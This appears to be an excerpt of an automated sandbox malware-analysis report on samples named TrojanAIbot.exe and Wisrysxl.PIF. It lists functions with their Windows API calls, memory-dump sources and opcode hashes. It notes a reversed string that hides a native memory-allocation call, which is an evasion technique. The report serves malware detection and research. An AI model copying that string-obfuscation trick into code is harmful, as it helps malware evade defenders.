Opcode ID: b2e6d3eb7b62a2d6f12dfd9c42c9b6a91065d2e9f1580be4e956a8821ea223f8
Instruction ID: 842722c8050494ca3ae11c0e115691d72765bfdb76b461a5860490200c4be90d
Opcode Fuzzy Hash: b2e6d3eb7b62a2d6f12dfd9c42c9b6a91065d2e9f1580be4e956a8821ea223f8
Instruction Fuzzy Hash: 7851D0B1D043199FDB14CF9AC884ADEBBF5FF48300F24856AE819AB210D775A845CFA0

Function 05B21C94 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05B26671

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 0f6ba3b7387380d1857371d5576ce86828f011793cba83ffe8c49b6b8350dcb9
Instruction ID: ca78d99be6c9cd95a1b43f219cf43895d0bd7ea2280585bebe98b3d5429064f9
Opcode Fuzzy Hash: 0f6ba3b7387380d1857371d5576ce86828f011793cba83ffe8c49b6b8350dcb9
Instruction Fuzzy Hash: EA414BB9900319CFDB15CF99C448AAABBF6FF88314F24C499D519A7321D735A840CFA4

Function 05B2F8A8 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 91e5d67d60649763ec80b53804895f033a5671d188de69413e818e4fc0536491
Instruction ID: 14065d8db3f2b174cae3e0462fa127d2bc23a04fccd01ebf4d244ef16371c74e
Opcode Fuzzy Hash: 91e5d67d60649763ec80b53804895f033a5671d188de69413e818e4fc0536491
Instruction Fuzzy Hash: 64318B729042589FCB11DFA9C805AEEBFF5EF09310F14809AE558AB261C335E950DFA1

Function 05B9483C Relevance: 1.6, APIs: 1, Instructions: 77
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 05B948D0

Memory Dump Source

Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 67faae4bc45605030ef3050cae9c28ff9a54e0865e35fd6a4a915746a60fb9a8
Instruction ID: ede0d4c0940284a471f80d9e4b0c68313d8596f59423a179a27a3fd70c18249e
Opcode Fuzzy Hash: 67faae4bc45605030ef3050cae9c28ff9a54e0865e35fd6a4a915746a60fb9a8
Instruction Fuzzy Hash: 7C3101B0901249DFDF14CF99C588BDDBBF6BF48304F248069E404AB394D7B56946CBA5

Function 05B2D520 Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32(?,00000000), ref: 05B2D592

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: e2af7deae908d40f66cf923394919e3c269b589658167d83828bf10369186d63
Instruction ID: f44fab2a74ce24e8dda12ea48497bf268597e94ef79ce60dbbd5a6cb1e6cccdd
Opcode Fuzzy Hash: e2af7deae908d40f66cf923394919e3c269b589658167d83828bf10369186d63
Instruction Fuzzy Hash: D62146B2D002198FDB14DF9AD845AEEBBF5FF98320F10846AD419A7240D778A546CBA1

Function 05B924CC Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 05B948D0

Memory Dump Source

Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: b276b0cebe6c942a7def40ed90f652fb924eb38a329d6a3124a6ab71d3f12226
Instruction ID: 6343c891bc8f8bb1c508320dfc1ff6eaa57570952427d3cf67d8212a5b329b8e
Opcode Fuzzy Hash: b276b0cebe6c942a7def40ed90f652fb924eb38a329d6a3124a6ab71d3f12226
Instruction Fuzzy Hash: 0C3101B0901249DFDF14DF99C988BDEBBF6FF48304F2080A9E405AB290D7B46945CBA5

Function 025BE080 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BFCC6,?,?,?,?,?), ref: 025BFD87

Memory Dump Source

Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6fe32e314127c6327639bb8f662c1d4aea44523e7da9b00d9997491d2bb52bec
Instruction ID: aa8e698f2ce8603e8b8426a820f39f1ce70a329e8d949129342342acb6084bc3
Opcode Fuzzy Hash: 6fe32e314127c6327639bb8f662c1d4aea44523e7da9b00d9997491d2bb52bec
Instruction Fuzzy Hash: D721E6B59002499FDB10CFAAD984AEEBFF5FF48310F14845AE918A7350D378A940CFA5

Function 025BFCFA Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BFCC6,?,?,?,?,?), ref: 025BFD87

Memory Dump Source

Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fc8b6e46a2abdc1a386f10631191e434561390d33c823c5f5ab1e856c172e6f5
Instruction ID: 646e28ef5fd174b1b4aa6c34358e40caf123d1dbc781bd55ef1eaca7ead8f135
Opcode Fuzzy Hash: fc8b6e46a2abdc1a386f10631191e434561390d33c823c5f5ab1e856c172e6f5
Instruction Fuzzy Hash: 8E21E3B59002089FDB10CFAAD984AEEBFF5FF48310F14845AE918A7210D378A944CFA5

Function 05B2E410 Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05B2F8C2,?,?,?,?,?), ref: 05B2F967

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 0460dcaeb6b1ebfc54774e81eb54ad8d3dc44b272fa74ff2a8a0c4a2c707c283
Instruction ID: 4f363889db6c39627a2984060df7bbdd7cfdffa89beadae86b2ae0b870425ed7
Opcode Fuzzy Hash: 0460dcaeb6b1ebfc54774e81eb54ad8d3dc44b272fa74ff2a8a0c4a2c707c283
Instruction Fuzzy Hash: 77218E76800359DFDB10CFAAC845AEEBFF8EF48310F14805AE555A7250C339A944CFA5

Function 05B2E41C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05B2F8C2,?,?,?,?,?), ref: 05B2F967

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: d314a9bd8cd6a2683b000782ff59c50a950e1740e59b371daf2bc863f4150215
Instruction ID: 4a7b0773174350ee1e617986357955c8b23d6fe3898ad3e79f1197ed0d652e0c
Opcode Fuzzy Hash: d314a9bd8cd6a2683b000782ff59c50a950e1740e59b371daf2bc863f4150215
Instruction Fuzzy Hash: 541159B18003599FDB10CFAAC845AEEBFF8EF48310F14845AE919A7210C379A950CFA0

Function 05B2D528 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 05B2D592

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 2ba0300a37a73ae3f72c70a11f143123d0ea45f3578c21fc83427fb5c318a665
Instruction ID: 1cd7a751931c80c608539f72f17e743746a68fd2610315b94133f6af4983a4bd
Opcode Fuzzy Hash: 2ba0300a37a73ae3f72c70a11f143123d0ea45f3578c21fc83427fb5c318a665
Instruction Fuzzy Hash: 581112B68002598FDB10CF9AC444BEEFBF5EF88320F10846AD859A7240D378A545CFA1

Function 05B2FC68 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05B2FCCD

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5036dfdbbdbbd068e8c16d023d9df488ca9ca7e5da3e133eab41d2eb7e6cbdcc
Instruction ID: 319a172646e0284845a1b29edaab55be49f6373a216abcc0b1dff658f652cd31
Opcode Fuzzy Hash: 5036dfdbbdbbd068e8c16d023d9df488ca9ca7e5da3e133eab41d2eb7e6cbdcc
Instruction Fuzzy Hash: 161133B58003098FCB10DF9AD48ABEEBFF8FB58310F10844AD918A7240C379A944CFA1

Function 025BD4F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025BD55E

Memory Dump Source

Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 446ae0ab3a8bdc290d0ba2e28a8bbcc595524027cc9815fbb625b01c0b9d47e1
Instruction ID: 75325c888f2c76a5eb8ac99b2e3e33736eff1d40dcdf8fb9477e3b1798f58cea
Opcode Fuzzy Hash: 446ae0ab3a8bdc290d0ba2e28a8bbcc595524027cc9815fbb625b01c0b9d47e1
Instruction Fuzzy Hash: 261110B6C002498FCB10CF9AC444ADEFBF4FF88314F10846AD819A7240D379A945CFA5

Function 05B2E460 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05B2FCCD

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: aaf17cd31e6925ffc012d8098be9034e0fc58b56009743cf1cbe11b0ca79503a
Instruction ID: 3c8ddf3910852da999c2a8c2f7e32dc6739099e7cac3e15831fa6c83446a3078
Opcode Fuzzy Hash: aaf17cd31e6925ffc012d8098be9034e0fc58b56009743cf1cbe11b0ca79503a
Instruction Fuzzy Hash: 6911F2B58003589FDB10DF9AD549BEEBFF8FB48320F10845AE919A7200C379A944CFA5

Function 05B21B7C Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05B24115

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d5467c87bbc4953c1fffabb2efd4db088f4ef11aba71753618c62f6d03b8c41d
Instruction ID: 2b427a4c2c20e01fcb3e417a3dde4c07c0895658dcd40e27f9748aa5e5dd1012
Opcode Fuzzy Hash: d5467c87bbc4953c1fffabb2efd4db088f4ef11aba71753618c62f6d03b8c41d
Instruction Fuzzy Hash: 6D1125B58002189FDB10DF9AC485BEEBBF8EB58310F20845AD919A7700C378A944CFB5

Function 05B93140 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05B9319D

Memory Dump Source

Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e1b6ee34a19f10889748843be3dc08b0691499e9d0b30f56f06d1001b22e7835
Instruction ID: 34a02c483d1b7f61829b2d4b6fb09e30718c129acba174d3f940ece2c499af8a
Opcode Fuzzy Hash: e1b6ee34a19f10889748843be3dc08b0691499e9d0b30f56f06d1001b22e7835
Instruction Fuzzy Hash: 961103B59006488FCB10DF9AD5497DEBFF4EF48310F24885AD519A7210C379A944CFA5

Function 05B240B1 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05B24115

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 836ca3a8e659d1bc81ca71ea258a5cf577b8fd1954293b055ce66541e42741df
Instruction ID: f19bf1b88cbff569447d1e26d91fb6141cc14f88b280addad933feaa37dbc96d
Opcode Fuzzy Hash: 836ca3a8e659d1bc81ca71ea258a5cf577b8fd1954293b055ce66541e42741df
Instruction Fuzzy Hash: 261103B58002589FDB10DF9AD585BDEBFF8EF58320F20845AD919A7700C379A944CFA1

Function 05B921B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05B9319D

Memory Dump Source

Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 896ec7e179d7a6b9ffb469cf4094a4dc80f187758c119308c93f1b7af40a4f58
Instruction ID: b7ef83d94ad1680cabf4df2cd7dbc16cffca9344f5727cc524c2d11341bafccb
Opcode Fuzzy Hash: 896ec7e179d7a6b9ffb469cf4094a4dc80f187758c119308c93f1b7af40a4f58
Instruction Fuzzy Hash: 7C1145B18003088FCB20DF9AD548B9EBFF4EB48310F20885AD519A7210C379A944CFA0

Function 05B9225C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05B93687), ref: 05B94125

Memory Dump Source

Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 033b24af7e447e3f23b0c149a4f27481624c384dfc192c121504a9c049036ceb
Instruction ID: fb1d390a615fade7cba6b959f26d2d631287a9c979b7dda5568768ab0943a548
Opcode Fuzzy Hash: 033b24af7e447e3f23b0c149a4f27481624c384dfc192c121504a9c049036ceb
Instruction Fuzzy Hash: EC11E0B5C046588FCB14DF9AD448A9EFBF4FB58314F10846AE519A7240D378A944CFA5

Function 05B940C1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,05B93687), ref: 05B94125

Memory Dump Source

Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: eccd6ab838b27d6a1f1e6fe24e0e2fca01950bee4c0526d2fd992aeb9931dba3
Instruction ID: 09d41963acb208959ced37224605aa1c79e1ee4699633da4fc36b98d26710b46
Opcode Fuzzy Hash: eccd6ab838b27d6a1f1e6fe24e0e2fca01950bee4c0526d2fd992aeb9931dba3
Instruction Fuzzy Hash: AE11FEB5C042588FCB10DF9AE545ADEFFF4FB48310F10856AE429A7200D378A545CFA5

Function 05B2D5D2 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 05B2D592

Memory Dump Source

Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 8f5da039ac3d795637278d1d909a7a2ffedf4bdd2db1f808d3b842af52bf6660
Instruction ID: 65da823254b6fe9c8f387d5eea1d355d21c9b44f1b5edc739c62a128e44062cd
Opcode Fuzzy Hash: 8f5da039ac3d795637278d1d909a7a2ffedf4bdd2db1f808d3b842af52bf6660
Instruction Fuzzy Hash: A9F0EC338083508FD3109B65C4083EEBBE0EB22329F19809AD088C2092C37C928ADB21

Function 00BAD704 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96c8d3b12670599ba0d835d33fba8ee08f6df85cc3c144e0a4f04f6bcd94d145
Instruction ID: 180655eddecca3860f25fea7d5ea314a5e308051195a784f679f91b9ab910a79
Opcode Fuzzy Hash: 96c8d3b12670599ba0d835d33fba8ee08f6df85cc3c144e0a4f04f6bcd94d145
Instruction Fuzzy Hash: C7216A71508200DFDB09DF14C9C0F26BFA5FB94314F20C1A9E90A0B656C336DC06C7A2

Function 00BBD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4518550786.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_bbd000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2c09a123901f2bbd4f96cd1f60be731d3b21d60121161dd43bec20e9e878172
Instruction ID: 7463a929b9511875b91b5a8a1f9407b8538a78e9f34ea3916c2d4dac4452f580
Opcode Fuzzy Hash: e2c09a123901f2bbd4f96cd1f60be731d3b21d60121161dd43bec20e9e878172
Instruction Fuzzy Hash: 3F212271604200DFCB14EF24D9D0B26BFA5FB88314F60C5ADD80A4B296D3BED807CA61

Function 00BBD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4518550786.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_bbd000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02bf752d257f8210cf4c16efa07038f96dd903d3b15838dd87bd2398cea4ab88
Instruction ID: d7a08d536ca30fc5e40255f1fc75be9b6f96c77f6981e747863266141e9e3700
Opcode Fuzzy Hash: 02bf752d257f8210cf4c16efa07038f96dd903d3b15838dd87bd2398cea4ab88
Instruction Fuzzy Hash: 8721A4755093808FCB02DF20D594715BFB1EB45314F28C5DAD8498B297C37A980ACB62

Function 00BAD6FF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: f7a9a99900d964f0b520cc0f2395cf28f1834550e9540c40ec38d5f20e435777
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: EE110376404280CFCB06CF10D9C4B16BFB1FB94314F24C6E9D94A0B656C336D85ACBA2

Function 00BAD07D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f9be23a6762f0723f7feb4a4b910637264c2c95b8cc884ec4d4d2369c850bf
Instruction ID: a8dec785c8fde3419e5aebf017b307fedddfd01a73a91b7a389abcdbcdb92535
Opcode Fuzzy Hash: 92f9be23a6762f0723f7feb4a4b910637264c2c95b8cc884ec4d4d2369c850bf
Instruction Fuzzy Hash: CE01F7310083009AE7309B25CC94B67BFD8EF57720F28C4AAED4A0A686C2799801CA71

Function 00BAD07C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4518365619.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_bad000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1255cec0b2d2762e3a8a8a4470ca99ab9ff1ccc288b3af5eb1bac67c5b98b2a
Instruction ID: e1cf7614e3338632efa8212121de9f7c3a511bcf3416f273d63539824d233fc1
Opcode Fuzzy Hash: d1255cec0b2d2762e3a8a8a4470ca99ab9ff1ccc288b3af5eb1bac67c5b98b2a
Instruction Fuzzy Hash: DBF0F6710083449EE7208A16CC84B63FFE8FF52734F18C45AED494F286C2799C40CA70

Analysis Process: TrojanAIbot.exePID: 2164, Parent PID: 1068COMMON

Executed Functions

Function 01370839 Relevance: .6, Instructions: 603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1541b9163fb5b9b1d37c19ba9f607c6d5a86564c090d8f2b1849bc871b5047f4
Instruction ID: df6668e8e5f8f076e287f37128f771fac1bc53c5fec4b5ba094b24279a2f7f34
Opcode Fuzzy Hash: 1541b9163fb5b9b1d37c19ba9f607c6d5a86564c090d8f2b1849bc871b5047f4
Instruction Fuzzy Hash: 5762DF70A02219CFCB65DF64D898B9DBBB2FF48700F1081A9D40AA7769DB359E85CF41

Function 01370848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95cfe32821314b47773bfd276882df80f66ef459787bae92e8498e5f97c2c77
Instruction ID: 6a3ba84cea0f6d5a472223c625c48028c933dbd6dad67057ade9c63e476997a4
Opcode Fuzzy Hash: a95cfe32821314b47773bfd276882df80f66ef459787bae92e8498e5f97c2c77
Instruction Fuzzy Hash: 9A62DF70A02219CFCB65DF64D898B9DBBB2FF48700F1081A9D40AA7769DB359E85CF41

Function 01375228 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ebc91e3f814e0d2baf3665d693844c52550a74c86227fb320449d3980f4b19a
Instruction ID: 17a18c1238d87bb909cc0bf2674cc5afe6c3ed32d2fbeee5e8a4037b2b2f1672
Opcode Fuzzy Hash: 0ebc91e3f814e0d2baf3665d693844c52550a74c86227fb320449d3980f4b19a
Instruction Fuzzy Hash: 97118E70C45309DFDB14AFB4D4583AEBFB0EB06305F1088A9C455E3591D7780A88CF52

Function 01375238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2267236738.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1370000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3aabaa97ed75debbde369b02c72c041b0038dd6f2757b4a7ecff159de32baf3
Instruction ID: 8dc6fc8a3394de427858a13d340106923ef84c98f3f82efce970f4a851c57308
Opcode Fuzzy Hash: e3aabaa97ed75debbde369b02c72c041b0038dd6f2757b4a7ecff159de32baf3
Instruction Fuzzy Hash: 2E012C70C4121ADFDB14EFB8D55C7AEBFB0EB05305F1098A9D416A3294DB794688CF91

Analysis Process: Wisrysxl.PIFPID: 7440, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1312
Total number of Limit Nodes:	13

Executed Functions

Function 02B67A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B67A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02B67A47
ntdll, xrefs: 02B67A74

Memory Dump Source

Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 421316089-445027087
Opcode ID: 3426682331046e6e0ddbe499db779ae77898b0a1e569c35c399326c5f31b0d1a
Instruction ID: e5bc12b29277788bbffb42a9b1a6e32b52f81698fc2e3bffa806dce358b80a05
Opcode Fuzzy Hash: 3426682331046e6e0ddbe499db779ae77898b0a1e569c35c399326c5f31b0d1a
Instruction Fuzzy Hash: 0F116175640209BFEB00DFA4DC55FEEB7BDEB48714F5084A1B904D7250EA34AA509B60

Function 02B67A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E

Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B67A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02B67A47
ntdll, xrefs: 02B67A74

Memory Dump Source

